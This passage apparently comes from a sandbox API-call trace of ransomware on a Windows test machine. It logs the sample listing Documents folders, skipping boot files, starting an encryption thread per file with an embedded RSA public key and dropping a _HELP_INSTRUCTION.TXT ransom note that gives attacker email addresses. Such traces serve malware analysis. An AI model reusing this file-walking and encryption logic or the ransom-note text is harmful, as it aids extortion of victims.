MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0178.470] lstrcpyW (in: lpString1=0x17addc, lpString2="73C0D9902A7964C0808D031B2E914908.XZZX" | out: lpString1="73C0D9902A7964C0808D031B2E914908.XZZX") returned="73C0D9902A7964C0808D031B2E914908.XZZX" [0178.470] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0178.470] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xae0 [0178.470] Sleep (dwMilliseconds=0x96) [0178.626] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0178.626] lstrcmpW (lpString1="7D60B7A8152CECB0B780C8B61944D0F8.XZZX", lpString2="..") returned 1 [0178.626] lstrcmpW (lpString1="7D60B7A8152CECB0B780C8B61944D0F8.XZZX", lpString2=".") returned 1 [0178.626] StrStrW (lpFirst="7D60B7A8152CECB0B780C8B61944D0F8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0178.626] StrStrW (lpFirst="7D60B7A8152CECB0B780C8B61944D0F8.XZZX", lpSrch="ntldr") returned 0x0 [0178.626] StrStrW (lpFirst="7D60B7A8152CECB0B780C8B61944D0F8.XZZX", lpSrch="NTLDR") returned 0x0 [0178.626] StrStrW (lpFirst="7D60B7A8152CECB0B780C8B61944D0F8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0178.626] StrStrW (lpFirst="7D60B7A8152CECB0B780C8B61944D0F8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0178.626] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0178.626] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") [0178.626] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0178.626] lstrcpyW (in: lpString1=0x17addc, lpString2="7D60B7A8152CECB0B780C8B61944D0F8.XZZX" | out: lpString1="7D60B7A8152CECB0B780C8B61944D0F8.XZZX") returned="7D60B7A8152CECB0B780C8B61944D0F8.XZZX" [0178.626] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0178.626] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xae4 [0178.626] Sleep (dwMilliseconds=0x96) [0178.781] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0178.781] lstrcmpW (lpString1="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX", lpString2="..") returned 1 [0178.781] lstrcmpW (lpString1="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX", lpString2=".") returned 1 [0178.781] StrStrW (lpFirst="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0178.781] StrStrW (lpFirst="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX", lpSrch="ntldr") returned 0x0 [0178.782] StrStrW (lpFirst="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX", lpSrch="NTLDR") returned 0x0 [0178.782] StrStrW (lpFirst="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0178.782] StrStrW (lpFirst="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX", lpSrch="ntdetect.com") returned 0x0 [0178.782] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0178.782] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") [0178.782] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0178.782] lstrcpyW (in: lpString1=0x17addc, lpString2="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX" | out: lpString1="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX") returned="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX" [0178.782] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0178.782] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xae8 [0178.782] Sleep (dwMilliseconds=0x96) [0178.939] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0178.939] lstrcmpW (lpString1="E3E55C1830B142FC6C2B225E34DE2744.XZZX", lpString2="..") returned 1 [0178.939] lstrcmpW (lpString1="E3E55C1830B142FC6C2B225E34DE2744.XZZX", lpString2=".") returned 1 [0178.939] StrStrW (lpFirst="E3E55C1830B142FC6C2B225E34DE2744.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0178.939] StrStrW (lpFirst="E3E55C1830B142FC6C2B225E34DE2744.XZZX", lpSrch="ntldr") returned 0x0 [0178.939] StrStrW (lpFirst="E3E55C1830B142FC6C2B225E34DE2744.XZZX", lpSrch="NTLDR") returned 0x0 [0178.939] StrStrW (lpFirst="E3E55C1830B142FC6C2B225E34DE2744.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0178.939] StrStrW (lpFirst="E3E55C1830B142FC6C2B225E34DE2744.XZZX", lpSrch="ntdetect.com") returned 0x0 [0178.939] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0178.939] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") [0178.940] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0178.940] lstrcpyW (in: lpString1=0x17addc, lpString2="E3E55C1830B142FC6C2B225E34DE2744.XZZX" | out: lpString1="E3E55C1830B142FC6C2B225E34DE2744.XZZX") returned="E3E55C1830B142FC6C2B225E34DE2744.XZZX" [0178.940] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0178.940] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xaec [0178.940] Sleep (dwMilliseconds=0x96) [0179.093] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0179.093] lstrcmpW (lpString1="F8F047460EB3954ECCCBC0D612CB7996.XZZX", lpString2="..") returned 1 [0179.093] lstrcmpW (lpString1="F8F047460EB3954ECCCBC0D612CB7996.XZZX", lpString2=".") returned 1 [0179.094] StrStrW (lpFirst="F8F047460EB3954ECCCBC0D612CB7996.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0179.094] StrStrW (lpFirst="F8F047460EB3954ECCCBC0D612CB7996.XZZX", lpSrch="ntldr") returned 0x0 [0179.094] StrStrW (lpFirst="F8F047460EB3954ECCCBC0D612CB7996.XZZX", lpSrch="NTLDR") returned 0x0 [0179.094] StrStrW (lpFirst="F8F047460EB3954ECCCBC0D612CB7996.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0179.094] StrStrW (lpFirst="F8F047460EB3954ECCCBC0D612CB7996.XZZX", lpSrch="ntdetect.com") returned 0x0 [0179.094] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0179.094] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") [0179.094] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0179.094] lstrcpyW (in: lpString1=0x17addc, lpString2="F8F047460EB3954ECCCBC0D612CB7996.XZZX" | out: lpString1="F8F047460EB3954ECCCBC0D612CB7996.XZZX") returned="F8F047460EB3954ECCCBC0D612CB7996.XZZX" [0179.094] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0179.094] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xaf0 [0179.095] Sleep (dwMilliseconds=0x96) [0179.249] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0179.249] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0179.249] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0179.249] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0179.249] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0179.250] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 1 [0179.250] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 0 [0179.250] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV" [0179.250] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\*.*" [0179.250] SetErrorMode (uMode=0x1) returned 0x1 [0179.250] wsprintfW (in: param_1=0x17a39c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\_HELP_INSTRUCTION.TXT") returned 98 [0179.251] GetUserNameW (in: lpBuffer=0x178178, pcbBuffer=0x177f64 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x177f64) returned 1 [0179.251] wsprintfW (in: param_1=0x177f70, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0179.251] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x177f6c | out: phkResult=0x177f6c*=0xaf4) returned 0x0 [0179.251] RegQueryValueExW (in: hKey=0xaf4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x437c1a8, lpcbData=0x177f68*=0x104 | out: lpType=0x0, lpData=0x437c1a8*=0x65, lpcbData=0x177f68*=0x4a) returned 0x0 [0179.251] RegCloseKey (hKey=0xaf4) returned 0x0 [0179.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17939c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0179.251] wsprintfW (in: param_1=0x17839c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0179.251] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xaf4 [0179.252] CloseHandle (hObject=0xaf4) returned 1 [0179.252] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdea18 [0179.252] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV") returned="ZW28zqHzfxAY2NV" [0179.252] lstrcpyW (in: lpString1=0x17a5a4, lpString2="ZW28zqHzfxAY2NV" | out: lpString1="ZW28zqHzfxAY2NV") returned="ZW28zqHzfxAY2NV" [0179.252] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0179.252] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.252] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0179.252] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.252] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0179.252] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0179.252] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0179.253] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0179.253] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0179.253] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0179.253] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0179.253] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0179.253] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0179.253] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0179.253] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0179.253] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0179.253] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 1 [0179.253] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 0 [0179.253] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0179.253] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0179.253] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0179.253] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0179.253] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0179.253] lstrcmpW (lpString1="My Music", lpString2="..") returned 1 [0179.253] lstrcmpW (lpString1="My Music", lpString2=".") returned 1 [0179.253] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0179.253] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0179.253] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" [0179.254] SetErrorMode (uMode=0x1) returned 0x1 [0179.254] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" [0179.254] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\" [0179.254] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\" [0179.254] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*" [0179.254] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0179.254] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0179.254] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" [0179.254] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My 